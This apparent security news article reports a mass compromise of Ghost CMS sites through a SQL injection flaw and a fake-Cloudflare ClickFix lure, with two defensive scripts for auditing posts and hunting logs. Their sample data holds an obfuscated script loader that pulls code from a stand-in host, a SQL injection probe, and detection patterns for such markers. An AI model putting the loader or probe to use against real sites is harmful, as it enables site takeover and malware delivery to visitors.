Over 700 websites running the Ghost CMS publishing platform have been compromised in a large-scale attack campaign exploiting a critical SQL injection vulnerability, researchers at Qianxin XLab have confirmed. The vulnerability, tracked as CVE-2026-26980 with a CVSS score of 9.4, requires no authentication to exploit and allows attackers to read arbitrary data from the database — including administrative API keys that unlock full site control.

Among the confirmed compromised sites: Harvard University, Oxford University, Auburn University, and DuckDuckGo. The injected payload deploys a ClickFix social engineering lure, tricking visitors into running malicious Windows commands under the guise of a Cloudflare human verification check.

The Vulnerability

CVE-2026-26980 is an SQL injection flaw in Ghost’s Content API — the interface Ghost uses to expose published content to themes, integrations, and headless front ends. The flaw affects Ghost versions 3.24.0 through 6.19.0, a range spanning years of releases and covering a substantial portion of the Ghost install base.

Exploitation requires no credentials or prior access. A crafted request to the Content API lets an attacker extract arbitrary rows from the Ghost database, and because Ghost stores integration keys in that database, this includes Admin API keys. An Admin API key grants full administrative control over the CMS instance: creating and modifying posts, managing users, and injecting arbitrary JavaScript into published content. Anything else in the same database (staff password hashes, member records, other integration secrets) should be assumed readable by the same technique.

The Attack Chain

Once an attacker extracts the Admin API key via the SQL injection, the attack chain has three more stages:

Stage 1 — JavaScript injection. The attacker uses the Admin API to insert malicious JavaScript into Ghost articles. The JavaScript is lightweight and serves as a loader — it does nothing visible on initial page load and is designed to evade automated scanners.

Stage 2 — Visitor fingerprinting. When a visitor loads a compromised page, the injected script silently fingerprints them: checking operating system, browser, geolocation, and behavioral signals. Only visitors who clear the fingerprint threshold — typically Windows desktop users in targeted geographies — proceed to the next stage.

Stage 3 — ClickFix lure delivery. Qualifying visitors see a full-page overlay that mimics Cloudflare’s CAPTCHA verification interface. The fake page instructs the visitor to “verify they are human” by pressing a keyboard shortcut that opens the Windows Run dialog, then pasting a provided command and pressing Enter. The command silently downloads and executes the malware payload.
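Stage 1 is the part of the chain a site operator can check for directly, and it is the same check the remediation advice below asks for (auditing posts and themes for injected JavaScript). The script below is an added example, not Ghost's own code and not the researchers' tooling. It assumes the layout of a Ghost JSON export (db[0].data.posts[] with html, codeinjection_head and codeinjection_foot fields, and db[0].data.settings[] as key/value rows), an operator-maintained allowlist of script hosts, and a constructed sample export; the loader markers it looks for are generic, not this campaign's specific code.

```python
"""Audit a Ghost content export for script tags the operator did not add.

Added example; assumes the Ghost export layout described in the lead-in.
Adjust ALLOWED_SCRIPT_HOSTS and the accessors for your own site.
"""
import json
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts you knowingly load scripts from (assumption; edit for your site).
ALLOWED_SCRIPT_HOSTS = {"cdn.jsdelivr.net"}

# Inline-code markers typical of a small loader (generic heuristic).
LOADER_MARKERS = ("eval(", "atob(", "unescape(", "document.createElement",
                  "fetch(", "XMLHttpRequest", "appendChild(")


class ScriptCollector(HTMLParser):
    """Collects every <script> element's src attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []      # list of {"src": str | None, "body": str}
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._current = {"src": dict(attrs).get("src"), "body": ""}

    def handle_data(self, data):
        # HTMLParser switches to CDATA mode inside <script>, so this is raw JS.
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def find_scripts(fragment):
    parser = ScriptCollector()
    parser.feed(fragment or "")
    parser.close()
    return parser.scripts


def classify(script):
    """Return a reason string if the script looks injected, else None."""
    if script["src"]:
        host = urlparse(script["src"]).netloc.lower()
        # Relative theme assets have no host; diff the theme against upstream separately.
        if host and host not in ALLOWED_SCRIPT_HOSTS:
            return f"external script from unlisted host {host}"
        return None
    body = script["body"].strip()
    hits = [m for m in LOADER_MARKERS if m in body]
    if hits or len(body) > 2000:
        return "inline script with loader markers: " + ", ".join(hits)
    return None


def audit_export(export):
    """Walk post HTML, per-post code injection and site-wide code injection."""
    data = export["db"][0]["data"]
    findings = []
    for post in data.get("posts", []):
        for field in ("html", "codeinjection_head", "codeinjection_foot"):
            for s in find_scripts(post.get(field)):
                reason = classify(s)
                if reason:
                    findings.append({"where": f"post:{post.get('slug')}:{field}",
                                     "reason": reason, "src": s["src"]})
    for row in data.get("settings", []):
        if row.get("key") in ("codeinjection_head", "codeinjection_foot"):
            for s in find_scripts(row.get("value")):
                reason = classify(s)
                if reason:
                    findings.append({"where": f"settings:{row['key']}",
                                     "reason": reason, "src": s["src"]})
    return findings


def load_export(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


# Constructed sample export: one clean post, one carrying an inline loader,
# and a site-wide footer injection pointing at an unlisted host.
SAMPLE_EXPORT = {"db": [{"data": {
    "posts": [
        {"slug": "welcome", "codeinjection_head": None, "codeinjection_foot": None,
         "html": '<p>Hello.</p><script src="https://cdn.jsdelivr.net/npm/prismjs/prism.min.js"></script>'},
        {"slug": "tainted-post", "codeinjection_head": None, "codeinjection_foot": None,
         "html": '<p>Quarterly update.</p><script>(function(){var s=document.createElement("script");'
                 's.src=atob("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvbC5qcw==");document.head.appendChild(s);})();</script>'},
    ],
    "settings": [
        {"key": "title", "value": "Example Blog"},
        {"key": "codeinjection_foot",
         "value": '<script src="https://static.example.invalid/verify.js" async></script>'},
    ],
}}]}


def audit_sample():
    return audit_export(SAMPLE_EXPORT)


if __name__ == "__main__":
    for finding in audit_sample():
        print(finding["where"], "->", finding["reason"])
```

Run it against a real export with `audit_export(load_export("ghost-export.json"))`; anything it flags still needs a human to confirm, but a script in a post body or in the code injection settings that nobody on the team recognises is exactly the Stage 1 artifact.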

Observed payloads from this campaign include DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe. Electron-wrapped malware is increasingly common because it can run cross-platform JavaScript payloads while appearing to be a legitimate desktop application install.

Scale and Discovery Timeline

Qianxin XLab researchers first detected the poisoning activity on May 7, 2026. At that point, 156 domains had been confirmed compromised. One week later — by May 14 — that number had grown past 500. By the time the campaign received broad public coverage in late May, the count exceeded 700 domains.

The victim profile is diverse: university portals, AI and SaaS company websites, media outlets, fintech firms, security-focused blogs, and personal sites. The presence of DuckDuckGo among the compromised sites is particularly notable given the company’s focus on privacy — it signals that the attackers were not specifically targeting organizations with weak security postures, but were systematically scanning for vulnerable Ghost installations regardless of their operator.

The campaign’s geographic spread, victim diversity, and automated exploitation approach suggest the attackers are running a scanning-and-exploit pipeline against internet-exposed Ghost instances rather than conducting targeted attacks against specific organizations.

Ghost’s Exposure

Ghost is a popular open-source CMS used by independent publishers, technology companies, newsletters, and educational institutions. Its focus on performance and developer experience has made it a common choice for organizations that want more control than WordPress provides without the complexity of a fully custom CMS.

The long version range affected by CVE-2026-26980 — from 3.24.0 to 6.19.0 — suggests the vulnerability existed in the codebase for an extended period before being discovered and patched. Ghost’s self-hosted install base is particularly exposed because update adoption is inconsistent: many organizations install Ghost and leave it running without regular maintenance.

Ghost has released a patch addressing CVE-2026-26980. Any organization running a self-hosted Ghost instance on a version prior to the fixed release should treat an immediate upgrade as a critical priority. The upgrade closes the hole but does nothing about data already extracted through it, so key rotation and a content audit (see Remediation) are still required afterwards.

The ClickFix Technique

ClickFix is a social engineering technique that has grown significantly in prevalence over the past 18 months. It exploits the fact that Windows users can execute arbitrary commands through the Run dialog (Win+R) or the Command Prompt, and that many users will follow simple on-screen instructions without understanding what they’re running.

The Cloudflare verification fake is particularly effective because Cloudflare challenges are a normal and expected part of web browsing for most users. The visual design of legitimate Cloudflare pages — the spinner, the security message, the verification prompt — is widely recognized. Attackers have refined their fakes to be nearly indistinguishable at a glance.

ClickFix campaigns have previously been linked to Lumma Stealer, AsyncRAT, and various banking trojans. The Ghost-based campaign’s use of UtilifySetup.exe and DLL loaders suggests a different payload chain, possibly affiliated with a distinct threat actor that has adopted ClickFix as a delivery mechanism.

Remediation

For Ghost site operators: Update to a fixed Ghost release immediately. Then treat every Admin API key as compromised and rotate the keys of all integrations, not just the one you suspect was used; because the flaw reads arbitrary database rows, reset staff passwords and invalidate existing sessions as well. Audit recent posts, the site-wide and per-post code injection settings, and the active theme for JavaScript you did not add; the loader in this campaign is small and invisible on page load, so look for scripts nobody can account for rather than for visible changes. Check your web server and Ghost logs for Content API requests with unusual query strings and for Admin API write requests (POST/PUT) from unfamiliar sources.
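The log check in the last step above, and the Content API probing described under The Vulnerability, can be turned into a simple hunt over the reverse proxy's access log. The script below is an added example, not from Ghost or from the researchers. It assumes the combined log format nginx or Apache writes in front of Ghost, the Ghost API route prefixes (/ghost/api/content/ and /ghost/api/admin/, with the older versioned prefixes), generic SQL-injection markers rather than this campaign's actual payload (which the article does not disclose, so the `param` query parameter in the sample is a placeholder), and a constructed sample log.

```python
"""Hunt an access log for Content API injection probes and Admin API writes.

Added example; heuristics are generic and the sample log is constructed.
"""
import re
from urllib.parse import unquote, urlsplit

# Combined log format written by nginx/Apache in front of Ghost (assumption).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
CONTENT_API_RE = re.compile(r"^/ghost/api/(?:v\d+/|canary/)?content/")
ADMIN_API_RE = re.compile(r"^/ghost/api/(?:v\d+/|canary/)?admin/")
# Generic SQL-injection markers in a decoded query string (heuristic, not the campaign's payload).
SQLI_RE = re.compile(r"'|\bunion\b|\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(|--|/\*", re.I)
WRITE_METHODS = {"POST", "PUT", "DELETE"}


def parse_line(line):
    """Split one combined-format line into fields; query string is URL-decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["path"])
    rec["route"] = parts.path
    rec["query"] = unquote(parts.query)
    return rec


def hunt(lines):
    """Return findings: SQLi-looking Content API hits, Admin API writes, and the
    escalation pattern of one IP probing the Content API and then writing."""
    findings, probers = [], set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if CONTENT_API_RE.match(rec["route"]) and SQLI_RE.search(rec["query"]):
            probers.add(rec["ip"])
            findings.append({"kind": "content_api_sqli", "ip": rec["ip"],
                             "query": rec["query"], "status": rec["status"]})
        elif ADMIN_API_RE.match(rec["route"]) and rec["method"] in WRITE_METHODS:
            # The Ghost admin UI sends a Referer under /ghost/; a key-based
            # integration or attacker script usually does not. Triage hint only.
            findings.append({"kind": "admin_api_write", "ip": rec["ip"],
                             "method": rec["method"], "route": rec["route"],
                             "editor_referer": "/ghost/" in rec["referer"], "ua": rec["ua"]})
            if rec["ip"] in probers:
                findings.append({"kind": "probe_then_write", "ip": rec["ip"]})
    return findings


# Constructed sample: one probe, one benign read, an API write from the prober,
# a normal page view, and an editor-originated write from another address.
SAMPLE_LOG = """\
203.0.113.7 - - [07/May/2026:03:12:41 +0000] "GET /ghost/api/content/posts/?key=K&param=%27%20OR%201%3D1-- HTTP/1.1" 200 18211 "-" "python-requests/2.31.0"
198.51.100.4 - - [07/May/2026:03:13:02 +0000] "GET /ghost/api/content/posts/?key=K&limit=5 HTTP/1.1" 200 9120 "https://blog.example.org/" "Mozilla/5.0"
203.0.113.7 - - [07/May/2026:03:14:10 +0000] "PUT /ghost/api/admin/posts/64b1f2c3e4d5a6b7c8d9e0f1/ HTTP/1.1" 200 4102 "-" "curl/8.4.0"
192.0.2.10 - - [07/May/2026:03:15:00 +0000] "GET /welcome/ HTTP/1.1" 200 5210 "-" "Mozilla/5.0"
198.51.100.4 - - [07/May/2026:03:16:33 +0000] "PUT /ghost/api/admin/posts/64b1f2c3e4d5a6b7c8d9e0f2/ HTTP/1.1" 200 4110 "https://blog.example.org/ghost/" "Mozilla/5.0"
"""


def hunt_sample():
    return hunt(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for f in hunt_sample():
        print(f)
```

Point `hunt()` at the real log (one line per element) and read the findings from the top: a `probe_then_write` entry is the strongest signal, an `admin_api_write` with `editor_referer` false from an address you do not run an integration on is the next thing to explain, and `content_api_sqli` hits on their own tell you who was scanning even if nothing else followed.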

For visitors of affected sites: If you encountered a Cloudflare-style verification prompt on any website that asked you to paste a command into a Windows dialog, assume your system is compromised. Commands entered through the Run dialog are recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so that key is a quick way to confirm whether a command was actually run and to recover it for analysis. Run a full malware scan, rotate any credentials stored in your browser from a machine you trust, and prefer a fresh OS image over cleanup if the malware analysis of UtilifySetup.exe indicates a persistent implant.
